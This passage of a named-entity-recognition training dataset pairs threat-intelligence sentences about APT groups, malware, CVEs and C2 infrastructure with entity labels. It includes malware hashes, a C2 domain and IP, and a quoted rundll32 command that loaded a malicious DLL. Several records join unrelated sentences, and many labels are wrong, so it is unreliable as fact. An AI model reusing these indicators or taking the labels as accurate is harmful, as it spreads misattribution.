ScarCruft": [[92, 101]], "THREAT_ACTOR: threat actors": [[277, 290]]}, "info": {"id": "cyberner_stix_train_007953", "source": "cyberner_stix_train"}} {"text": "In most cases they would be crafted to appear as applications distributed by unspecified mobile operators in Italy . Initial inspection of this attack suggested this was again the OilRig campaign using their existing toolset , but further examination revealed not only new variants of the delivery document we named Clayslide , but also a different payload embedded inside it . 
Feature-wise , the RAT has three commands : UNC2529 displayed indications of target research based on their selection of sender email addresses and subject lines which were tailored to their intended victims .", "spans": {"TOOL: Clayslide": [[316, 325]], "TOOL: RAT": [[397, 400]], "THREAT_ACTOR: UNC2529": [[422, 429]]}, "info": {"id": "cyberner_stix_train_007954", "source": "cyberner_stix_train"}} {"text": "While WERDLOD kills processes for Internet Explorer , Firefox , and Chrome , OSX_DOK.C does the same on Safari , Firefox , and Chrome .", "spans": {"MALWARE: WERDLOD": [[6, 13]], "TOOL: Internet Explorer": [[34, 51]], "TOOL: Firefox": [[54, 61], [113, 120]], "TOOL: Chrome": [[68, 74], [127, 133]], "MALWARE: OSX_DOK.C": [[77, 86]], "TOOL: Safari": [[104, 110]]}, "info": {"id": "cyberner_stix_train_007955", "source": "cyberner_stix_train"}} {"text": "Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . 
Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework .", "spans": {"THREAT_ACTOR: Whitefly": [[88, 96]], "ORGANIZATION: defense": [[130, 137]], "ORGANIZATION: telecoms": [[140, 148]], "ORGANIZATION: energy": [[155, 161]], "FILEPATH: slides": [[234, 240]], "VULNERABILITY: exploit": [[253, 260]], "VULNERABILITY: CVE-2017-8759": [[265, 278]], "TOOL: Microsoft .NET framework": [[322, 346]]}, "info": {"id": "cyberner_stix_train_007956", "source": "cyberner_stix_train"}} {"text": "It was executed via rundll32 commands such as : rundll32.exe “ C:\\Windows\\twain_64.dll ” .", "spans": {"FILEPATH: rundll32.exe": [[48, 60]], "FILEPATH: C:\\Windows\\twain_64.dll": [[63, 86]]}, "info": {"id": "cyberner_stix_train_007957", "source": "cyberner_stix_train"}} {"text": "Pivoting from the Mozilla v5.1 user agent revealed over forty additional Zebrocy samples , with several again targeting the same Central Asian nation .", "spans": {"ORGANIZATION: Mozilla": [[18, 25]], "MALWARE: Zebrocy": [[73, 80]]}, "info": {"id": "cyberner_stix_train_007958", "source": "cyberner_stix_train"}} {"text": "The initial dropper , upon execution , extracts an embedded Downeks instance :", "spans": {"MALWARE: Downeks": [[60, 67]]}, "info": {"id": "cyberner_stix_train_007959", "source": "cyberner_stix_train"}} {"text": "The attack involving this updated variant of DealersChoice was targeting a European government organization .", "spans": {"TOOL: DealersChoice": [[45, 58]]}, "info": {"id": "cyberner_stix_train_007960", "source": "cyberner_stix_train"}} {"text": "A Humanitarian Bulletin published by the United Nations ’ Office for the Coordination of Humanitarian Affairs indicates in March 2017 ( just before the first malware samples associated with this campaign were identified in early April ) Hamas created “ a parallel institution to run local ministries in Gaza , ”", "spans": {"ORGANIZATION: United Nations ’ 
Office": [[41, 64]], "ORGANIZATION: Coordination of Humanitarian Affairs": [[73, 109]], "ORGANIZATION: Hamas": [[237, 242]]}, "info": {"id": "cyberner_stix_train_007961", "source": "cyberner_stix_train"}} {"text": "Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services . After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought .", "spans": {"TOOL: Metel": [[0, 5]], "TOOL: banking Trojan": [[11, 25]], "THREAT_ACTOR: Corkow": [[42, 48]], "ORGANIZATION: CTU": [[202, 205]], "THREAT_ACTOR: TG-3390": [[220, 227]]}, "info": {"id": "cyberner_stix_train_007963", "source": "cyberner_stix_train"}} {"text": "FortiGuard Labs has been monitoring a Linux coin mining campaign from \" Rocke \" – a malware threat group specializing in cryptomining . Wild Neutron 's targeting of major IT companies , spyware developers ( FlexiSPY ) , jihadist forums ( the \" Ansar Al-Mujahideen English Forum \" ) and Bitcoin companies indicate a flexible yet unusual mindset and interests .", "spans": {"ORGANIZATION: FortiGuard Labs": [[0, 15]], "THREAT_ACTOR: Wild Neutron": [[136, 148]], "ORGANIZATION: IT companies": [[171, 183]], "ORGANIZATION: spyware developers": [[186, 204]], "ORGANIZATION: FlexiSPY": [[207, 215]], "ORGANIZATION: jihadist forums": [[220, 235]], "ORGANIZATION: Ansar Al-Mujahideen English Forum": [[244, 277]], "ORGANIZATION: Bitcoin companies": [[286, 303]]}, "info": {"id": "cyberner_stix_train_007964", "source": "cyberner_stix_train"}} {"text": "The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . 
In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group .", "spans": {"VULNERABILITY: CVE-2012-0773": [[4, 17]], "ORGANIZATION: DHS": [[104, 107]]}, "info": {"id": "cyberner_stix_train_007965", "source": "cyberner_stix_train"}} {"text": "Both OnionDuke and MiniDuke also use date-based algorithms to generate Twitter account names and then searched for any tweets from those accounts that linked to image files .", "spans": {"MALWARE: OnionDuke": [[5, 14]], "MALWARE: MiniDuke": [[19, 27]], "TOOL: Twitter": [[71, 78]]}, "info": {"id": "cyberner_stix_train_007966", "source": "cyberner_stix_train"}} {"text": "We named this campaign “ Bouncing Golf ” based on the malware ’ s code in the package named “ golf. ” The malware involved , which Trend Micro detects as AndroidOS_GolfSpy.HRX , is notable for its wide range of cyberespionage capabilities . Next , in an effort to demonstrate it wasn't relegated to China , CrowdStrike exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary . The Task Scheduler service names the tasks , so subsequent tasks are named At2 , At3 , and so on . 
The companies infected by the malware primarily market so - called massively multiplayer online role - playing games .", "spans": {"MALWARE: Bouncing Golf": [[25, 38]], "ORGANIZATION: Trend Micro": [[131, 142]], "MALWARE: AndroidOS_GolfSpy.HRX": [[154, 175]], "ORGANIZATION: CrowdStrike": [[307, 318]], "MALWARE: malware": [[587, 594]], "MALWARE: massively multiplayer online role - playing games": [[624, 673]]}, "info": {"id": "cyberner_stix_train_007967", "source": "cyberner_stix_train"}} {"text": "Suckfly delivered Nidiran through a strategic web compromise .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]], "MALWARE: Nidiran": [[18, 25]]}, "info": {"id": "cyberner_stix_train_007968", "source": "cyberner_stix_train"}} {"text": "DLL hijacking techniques have been seen in the past with the APT15 group . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B .", "spans": {"THREAT_ACTOR: APT15 group": [[61, 72]], "FILEPATH: XAgent": [[89, 95]], "FILEPATH: IOS_XAGENT.A": [[108, 120]], "FILEPATH: MadCap": [[180, 186]], "FILEPATH: XAGENT.B": [[204, 212]]}, "info": {"id": "cyberner_stix_train_007969", "source": "cyberner_stix_train"}} {"text": "The malware starts communicating with the C&C server by sending basic information about the infected machine . 
The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content .", "spans": {"MALWARE: malware": [[4, 11]], "FILEPATH: archive": [[125, 132]], "TOOL: WinRAR": [[171, 177]], "VULNERABILITY: vulnerability": [[193, 206]]}, "info": {"id": "cyberner_stix_train_007970", "source": "cyberner_stix_train"}} {"text": "For instance , its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox .", "spans": {"MALWARE: JHUHUGIT": [[19, 27]], "TOOL: Flash": [[60, 65]], "VULNERABILITY: zero-day": [[66, 74]], "SYSTEM: Windows": [[86, 93]], "TOOL: EoP": [[94, 97]]}, "info": {"id": "cyberner_stix_train_007971", "source": "cyberner_stix_train"}} {"text": "The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The Intercept reported that there exists a 2011 presentation by Canada 's Communication Security Establishment ( CSE ) outlining the errors made by the Turla operators during their operations even though the tools they use are quite advanced .", "spans": {"THREAT_ACTOR: Sofacy group": [[4, 16]], "VULNERABILITY: Flash exploits": [[60, 74]], "TOOL: Carberp": [[92, 99]], "TOOL: JHUHUGIT downloaders": [[106, 126]], "ORGANIZATION: Canada 's Communication Security Establishment": [[223, 269]], "ORGANIZATION: CSE": [[272, 275]], "THREAT_ACTOR: Turla": [[311, 316]]}, "info": {"id": "cyberner_stix_train_007973", "source": "cyberner_stix_train"}} {"text": "These domains have been registered by the attackers since 2015 . We assume that RunPow stands for run PowerShell , ” and triggers the PowerShell code embedded inside the .dll file . 
Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 ( TG-2889 ) .", "spans": {"MALWARE: PowerShell": [[102, 112]], "MALWARE: .dll file": [[170, 179]], "THREAT_ACTOR: Cleaver": [[222, 229]], "THREAT_ACTOR: Threat Group 2889": [[243, 260]], "THREAT_ACTOR: TG-2889": [[263, 270]]}, "info": {"id": "cyberner_stix_train_007974", "source": "cyberner_stix_train"}} {"text": "EventBot Randomized package name Randomized package name instead of com.example.eventbot . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT .", "spans": {"MALWARE: EventBot": [[0, 8]], "TOOL: SDK": [[95, 98]], "MALWARE: SWAnalytics": [[107, 118]], "ORGANIZATION: Tencent MyApp": [[234, 247]], "ORGANIZATION: Wandoujia": [[250, 259]], "ORGANIZATION: Huawei App Store": [[262, 278]], "ORGANIZATION: Xiaomi App Store": [[285, 301]], "ORGANIZATION: social media": [[334, 346]], "MALWARE: RATs": [[493, 497]], "MALWARE: PupyRAT": [[506, 513]]}, "info": {"id": "cyberner_stix_train_007975", "source": "cyberner_stix_train"}} {"text": "The placement of the decoy functionality is likely designed to confuse the malware researchers . We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation . 
The initial request , referred to as the helo/hello request in the Nmap script , is comprised of four DWORDs .", "spans": {"THREAT_ACTOR: attacks": [[162, 169]], "ORGANIZATION: complicated Palestinian situation": [[227, 260]], "TOOL: Nmap": [[330, 334]], "TOOL: DWORDs": [[365, 371]]}, "info": {"id": "cyberner_stix_train_007976", "source": "cyberner_stix_train"}} {"text": "With Cybereason Mobile , our customers can protect against modern threats across traditional and mobile endpoints , all within a single console . The Word document usually exploits CVE-2012-0158 . This , in turn , would provide access to a larger amount of intellectual property and sensitive data .", "spans": {"SYSTEM: Cybereason Mobile": [[5, 22]], "MALWARE: Word document": [[150, 163]], "VULNERABILITY: CVE-2012-0158": [[181, 194]]}, "info": {"id": "cyberner_stix_train_007977", "source": "cyberner_stix_train"}} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . 
If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]], "FILEPATH: bot": [[214, 217]]}, "info": {"id": "cyberner_stix_train_007978", "source": "cyberner_stix_train"}} {"text": "We do not know whether the Dukes compiled the components themselves or whether someone else compiled the components before handing them to the group .", "spans": {"THREAT_ACTOR: Dukes": [[27, 32]]}, "info": {"id": "cyberner_stix_train_007979", "source": "cyberner_stix_train"}} {"text": "The Windows version of UnionCryptoTrader updater ( 629b9de3e4b84b4a0aa605a3e9471b31 ) has similar functionality to the macOS version .", "spans": {"SYSTEM: Windows": [[4, 11]], "TOOL: UnionCryptoTrader": [[23, 40]], "FILEPATH: 629b9de3e4b84b4a0aa605a3e9471b31": [[51, 83]], "SYSTEM: macOS": [[119, 124]]}, "info": {"id": "cyberner_stix_train_007980", "source": "cyberner_stix_train"}} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list .", "spans": {"MALWARE: document": [[34, 42]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "FILEPATH: botnet encompassed": [[152, 170]], "ORGANIZATION: financial institutions": [[245, 267]]}, "info": {"id": "cyberner_stix_train_007981", "source": "cyberner_stix_train"}} {"text": "Figure 1 . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . The spear phishing campaigns were remarkably sophisticated from a social engineering perspective . 
Digital certificates stolen in some of the heists have been used to sign malware that targeted Tibetan and Uyghur activists .", "spans": {"THREAT_ACTOR: ScarCruft": [[11, 20]], "SYSTEM: Digital certificates": [[250, 270]], "ORGANIZATION: Tibetan and Uyghur activists": [[345, 373]]}, "info": {"id": "cyberner_stix_train_007982", "source": "cyberner_stix_train"}} {"text": "Whitefly compromises its victims using custom malware alongside open-source hacking tools and living off the land tactics , such as malicious PowerShell scripts . To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "TOOL: PowerShell scripts": [[142, 160]], "THREAT_ACTOR: Rocke": [[215, 220]], "VULNERABILITY: vulnerabilities": [[236, 251]], "TOOL: Oracle WebLogic": [[273, 288]], "TOOL: Adobe ColdFusion": [[295, 311]]}, "info": {"id": "cyberner_stix_train_007983", "source": "cyberner_stix_train"}} {"text": "It checks whether it is being run in an emulator before it starts its malicious activity . The intelligence we have collected shows that Silence is part of a more extensive operation , still focused on financial institutions operating mainly on Russian territory . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called “ CopyPaste ” from a previously unknown APT . 
As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": {"ORGANIZATION: financial institutions": [[202, 224]], "THREAT_ACTOR: FIN7": [[310, 314]], "THREAT_ACTOR: CopyPaste": [[402, 411]], "SYSTEM: CSP": [[527, 530]], "SYSTEM: Google Analytics": [[735, 751]]}, "info": {"id": "cyberner_stix_train_007984", "source": "cyberner_stix_train"}} {"text": "RCSession C2 server : toshibadrive.com .", "spans": {"MALWARE: RCSession": [[0, 9]], "TOOL: C2": [[10, 12]], "DOMAIN: toshibadrive.com": [[22, 38]]}, "info": {"id": "cyberner_stix_train_007985", "source": "cyberner_stix_train"}} {"text": "Internal name : snd.dll File format : PE32 DLL MD5: 8c4d896957c36ec4abeb07b2802268b9 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.07.24 12:07:27 ( GMT ) Exported functions :", "spans": {"FILEPATH: snd.dll": [[16, 23]], "TOOL: DLL": [[43, 46]], "FILEPATH: 8c4d896957c36ec4abeb07b2802268b9": [[52, 84]], "ORGANIZATION: Microsoft": [[109, 118]], "TOOL: Visual Studio": [[119, 132]], "TOOL: GMT": [[174, 177]]}, "info": {"id": "cyberner_stix_train_007986", "source": "cyberner_stix_train"}} {"text": "All that is needed is to get the original size of the DEX file and read everything that comes after this offset . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . Detecting malicious code hidden using this method is not trivial , so process hollowing has become a prevalent technique used by malware today . 
Following a successful infection , callbacks are made to the RAT 's command and control server at 94.158.247[.]27 .", "spans": {"VULNERABILITY: CVE-2012-0773": [[118, 131]], "TOOL: process hollowing": [[268, 285]], "SYSTEM: control server": [[423, 437]]}, "info": {"id": "cyberner_stix_train_007987", "source": "cyberner_stix_train"}} {"text": "With mobile devices increasingly used in the corporate environment , thanks to the popularity of BYOD policies , this malware has the potential to cause serious harm , mostly to consumers , and businesses that allow the installation of unsigned applications . In another case , Sima mirrored an announcement made about the broadcast of a television program on Iranian-American cultural affairs in order to impersonate the individual and engage in spearphishing within hours of the legitimate message . However , recent data seems to indicate that the attacks have continued without significant drawbacks . The problem is that CSP does n't support query strings ( See Spec ):", "spans": {"THREAT_ACTOR: Sima": [[278, 282]], "SYSTEM: CSP": [[626, 629]]}, "info": {"id": "cyberner_stix_train_007988", "source": "cyberner_stix_train"}} {"text": "In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched . 
The malicious loader will use dynamic-link library ( DLL ) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe ( a normal file ) .", "spans": {"THREAT_ACTOR: group": [[37, 42]], "VULNERABILITY: CVE-2016-4117": [[101, 114]], "TOOL: dynamic-link library": [[238, 258]], "TOOL: DLL": [[261, 264]], "FILEPATH: sidebar.exe": [[346, 357]], "FILEPATH: dllhost.exe": [[369, 380]]}, "info": {"id": "cyberner_stix_train_007989", "source": "cyberner_stix_train"}} {"text": "Because a user interacting with an ad often leads to a higher chance of the user purchasing something , ad networks often \" pay per click '' to developers who host their ads . WildFire correctly classifies NetTraveler as malicious . This tactic is not without precedent ; in 2013 , the New York Times revealed it had been the target of China based actors shortly after it reported on the alleged mass accumulation of wealth by then-Prime Minister Wen Jiabao and his family . Several Democratic lawmakers released a report last week that accused TaxAct , H&R Block and TaxSlayer of embedding Meta and Google ’s tracking pixels on their sites , potentially violating U.S. 
law and sharing taxpayers ’ information with those companies .", "spans": {"ORGANIZATION: WildFire": [[176, 184]], "TOOL: NetTraveler": [[206, 217]], "ORGANIZATION: New York Times": [[286, 300]], "ORGANIZATION: Democratic lawmakers": [[483, 503]], "ORGANIZATION: TaxAct": [[545, 551]], "ORGANIZATION: H&R Block": [[554, 563]], "SYSTEM: TaxSlayer": [[568, 577]], "ORGANIZATION: Meta": [[591, 595]], "ORGANIZATION: Google ’s tracking pixels": [[600, 625]], "SYSTEM: sites": [[635, 640]]}, "info": {"id": "cyberner_stix_train_007990", "source": "cyberner_stix_train"}} {"text": "1 Fadi Alsalamin scandal with an Israeli officer - exclusive - watched before the deletion - Fadi Elsalameen The details of the assassination of President Arafat_06-12-2016_docx Quds.rar Many of these executables are associated with various short links created using Bit.ly , a URL shortening service . Similar to our approach with Symantec 's report on Hidden Lynx , we used Recorded Future to organize the technical details about the DeputyDog attacks to reveal technical information described in the open source reporting across multiple campaigns . In lieu of manually editing an HTML file on a hop point , we have also observed APT1 intruders uploading new ( already-edited ) HTML files . 
Lesser - known threat actors want to piggyback off having a big name associated with them , like DarkSide , to intimidate their actors or lend more credence to the effectiveness of their threats .", "spans": {"SYSTEM: Bit.ly": [[267, 273]], "ORGANIZATION: Symantec": [[332, 340]], "TOOL: HTML": [[584, 588], [681, 685]], "THREAT_ACTOR: APT1": [[633, 637]], "THREAT_ACTOR: Lesser - known threat actors": [[694, 722]], "MALWARE: DarkSide": [[791, 799]]}, "info": {"id": "cyberner_stix_train_007991", "source": "cyberner_stix_train"}} {"text": "Most of these commands are related to gathering information from the infected machine ( number of CPU cores , users , scheduled tasks , running processes , OS installed , and CPU and memory information ) via the dota3 payload , as well as changing the password to a random string also stored in /tmp/up.txt .", "spans": {"TOOL: CPU": [[98, 101], [175, 178]], "TOOL: dota3": [[212, 217]], "FILEPATH: /tmp/up.txt": [[295, 306]]}, "info": {"id": "cyberner_stix_train_007992", "source": "cyberner_stix_train"}} {"text": "After building an initial rapport with targets , the actors behind these social media accounts would instruct victims to install an additional app for easier communication . It mainly targets Microsoft Outlook , a widely used mail client , but also targets The Bat! , a mail client very popular in Eastern Europe . A new service is then created using the service parser function ProcessScCommand . None Read about adversaries tracked by CrowdStrike in 2021 in the and in the • None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": {"ORGANIZATION: CrowdStrike": [[437, 448]]}, "info": {"id": "cyberner_stix_train_007993", "source": "cyberner_stix_train"}} {"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . 
The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen” command to take a screenshot . A paper from FireEye in 2013 on several campaigns using PIVY included menuPass as one of them .", "spans": {"MALWARE: Trojan": [[57, 63]], "MALWARE: .NET RocketMan Trojan": [[88, 109]], "ORGANIZATION: FireEye": [[228, 235]], "MALWARE: PIVY": [[271, 275]]}, "info": {"id": "cyberner_stix_train_007994", "source": "cyberner_stix_train"}} {"text": "FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL’s Kalignite multivendor ATM platform . In 2015 , the Metel gang began to target banks and financial institutions directly .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: Ploutus": [[68, 75]], "MALWARE: Ploutus-D": [[85, 94]], "ORGANIZATION: banks": [[201, 206]], "ORGANIZATION: financial institutions": [[211, 233]]}, "info": {"id": "cyberner_stix_train_007995", "source": "cyberner_stix_train"}} {"text": "Command & Control Communication The C2 communication of Zyklon is proxied through the Tor network . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa .", "spans": {"THREAT_ACTOR: Zyklon": [[56, 62]], "TOOL: Tor network": [[86, 97]], "FILEPATH: DeltaAlfa": [[114, 123]], "MALWARE: DDoS bot": [[136, 144]]}, "info": {"id": "cyberner_stix_train_007997", "source": "cyberner_stix_train"}} {"text": "This technique enables the malware to efficiently run while evading unpacking techniques from the AntiVirus-integrated UPX library .", "spans": {}, "info": {"id": "cyberner_stix_train_007998", "source": "cyberner_stix_train"}} {"text": "Our first observation of an attempted attack related to this campaign dates back to November 2015 , although Symantec telemetry data indicates that the campaign may have already existed in early 2015 or perhaps even earlier . 
Subdomains at phmail.us have been linked to malicious activity dating back as far as December 2011 .", "spans": {"ORGANIZATION: Symantec": [[109, 117]]}, "info": {"id": "cyberner_stix_train_007999", "source": "cyberner_stix_train"}} {"text": "In our analysis , we distinguish between two separate campaigns happening simultaneously .", "spans": {}, "info": {"id": "cyberner_stix_train_008000", "source": "cyberner_stix_train"}} {"text": "Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns .", "spans": {"THREAT_ACTOR: Gorgon": [[0, 6]], "THREAT_ACTOR: actor": [[145, 150]], "MALWARE: Panda Banker": [[165, 177]], "ORGANIZATION: Arbor": [[242, 247]], "FILEPATH: Panda Banker": [[318, 330]]}, "info": {"id": "cyberner_stix_train_008001", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 5e5ea1a67c2538dbc01df28e4ea87472 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "FILEPATH: 5e5ea1a67c2538dbc01df28e4ea87472": [[11, 43]]}, "info": {"id": "cyberner_stix_train_008002", "source": "cyberner_stix_train"}} {"text": "Once executed , Vcrodat loads an encrypted payload on to the victim 's computer . Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() .", "spans": {"TOOL: Vcrodat": [[16, 23]], "VULNERABILITY: CVE-2017-10271": [[192, 206]], "MALWARE: PowerShell": [[220, 230]]}, "info": {"id": "cyberner_stix_train_008003", "source": "cyberner_stix_train"}} {"text": "The threat actor Rocke was first reported by Cisco Talos in late July 2018 . 
During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk.com , which is an iPhone developers forum .", "spans": {"ORGANIZATION: Cisco Talos": [[45, 56]]}, "info": {"id": "cyberner_stix_train_008004", "source": "cyberner_stix_train"}} {"text": "However , we have not seen Bart since , suggesting that this was either an experiment or that the ransomware did not function as expected for TA505 .", "spans": {"MALWARE: Bart": [[27, 31]], "THREAT_ACTOR: TA505": [[142, 147]]}, "info": {"id": "cyberner_stix_train_008005", "source": "cyberner_stix_train"}} {"text": "TA505 introduced Jaff ransomware in May 2017 .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Jaff": [[17, 21]]}, "info": {"id": "cyberner_stix_train_008006", "source": "cyberner_stix_train"}} {"text": "Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu .", "spans": {"TOOL: PDF": [[32, 35]], "TOOL: DOC": [[40, 43]], "FILEPATH: Backdoor.Sogu": [[91, 104]]}, "info": {"id": "cyberner_stix_train_008007", "source": "cyberner_stix_train"}} {"text": "While accessing the domain from a browser you get a login page very similar to other malware panels . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more . 
Proofpoint is tracking this attacker , believed to operate out of China , as TA459 .", "spans": {"THREAT_ACTOR: Lazarus": [[116, 123]], "ORGANIZATION: enterprises": [[218, 229]], "THREAT_ACTOR: attackers": [[241, 250]], "ORGANIZATION: Proofpoint": [[318, 328]], "THREAT_ACTOR: TA459": [[395, 400]]}, "info": {"id": "cyberner_stix_train_008008", "source": "cyberner_stix_train"}} {"text": "We can compare it to the sample e338d49c270baf64363879e5eecb8fa6bdde8ad9 used in May 2017 by Group 74 .", "spans": {"FILEPATH: e338d49c270baf64363879e5eecb8fa6bdde8ad9": [[32, 72]], "THREAT_ACTOR: Group 74": [[93, 101]]}, "info": {"id": "cyberner_stix_train_008009", "source": "cyberner_stix_train"}} {"text": "NEWMSG – write an SMS to the device memory containing the text and sender number sent from C & C . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": {"MALWARE: Backdoor.Nidiran": [[208, 224]], "VULNERABILITY: EternalBlue": [[331, 342]], "VULNERABILITY: exploits": [[343, 351]], "MALWARE: Petya": [[465, 470]], "MALWARE: NotPetya": [[473, 481]]}, "info": {"id": "cyberner_stix_train_008010", "source": "cyberner_stix_train"}} {"text": "c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184 d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c this SWC was used to specifically target Turkish goverment . XGen security also powers Trend Micro ’s suite of security solutions : Hybrid Cloud Security and User Protection . 
We initially tracked this activity as UNC3810 before merging the cluster with Sandworm .", "spans": {"TOOL: SWC": [[265, 268]], "ORGANIZATION: XGen": [[321, 325]], "ORGANIZATION: Trend Micro": [[347, 358]], "THREAT_ACTOR: UNC3810": [[474, 481]], "THREAT_ACTOR: Sandworm": [[514, 522]]}, "info": {"id": "cyberner_stix_train_008011", "source": "cyberner_stix_train"}} {"text": "September 08 , 2020 TikTok Spyware A detailed analysis of spyware masquerading as TikTok A recent threat to ban TikTok in the United States has taken the internet by storm and received mixed reactions from social media and internet users . As with the 2016 series of virtual bank heists , including the Bangladesh Bank heist , FASTCash illustrates that Lazarus possesses an in-depth knowledge of banking systems and transaction processing protocols and has the expertise to leverage that knowledge in order to steal large sums from vulnerable banks . Analysisof these larger convoluted clusters is ongoing .", "spans": {"SYSTEM: TikTok": [[20, 26], [82, 88], [112, 118]], "ORGANIZATION: FASTCash": [[327, 335]], "THREAT_ACTOR: Lazarus": [[353, 360]]}, "info": {"id": "cyberner_stix_train_008013", "source": "cyberner_stix_train"}} {"text": "Interestingly , the two communication apps described above as being targeted by the HenBox variant listed in Table 3 do not appear in this updated list . APT41 regularly leverages code-signing certificates to sign malware when targeting both gaming and nongaming organizations . 
The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke .", "spans": {"THREAT_ACTOR: APT41": [[154, 159]], "TOOL: code-signing certificates": [[180, 205]], "ORGANIZATION: nongaming organizations": [[253, 276]], "THREAT_ACTOR: Dukes": [[283, 288]], "MALWARE: MiniDuke": [[367, 375]], "MALWARE: CosmicDuke": [[378, 388]], "MALWARE: OnionDuke": [[391, 400]], "MALWARE: CozyDuke": [[403, 411]], "MALWARE: CloudDuke": [[414, 423]], "MALWARE: SeaDuke": [[426, 433]], "MALWARE: HammerDuke": [[436, 446]], "MALWARE: PinchDuke": [[449, 458]], "MALWARE: GeminiDuke": [[465, 475]]}, "info": {"id": "cyberner_stix_train_008014", "source": "cyberner_stix_train"}} {"text": "In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor .", "spans": {"TOOL: Delphi": [[106, 112]]}, "info": {"id": "cyberner_stix_train_008016", "source": "cyberner_stix_train"}} {"text": "Gold Lowell responded by modifying a registry entry to disable the endpoint tool 's scanning functionality . 
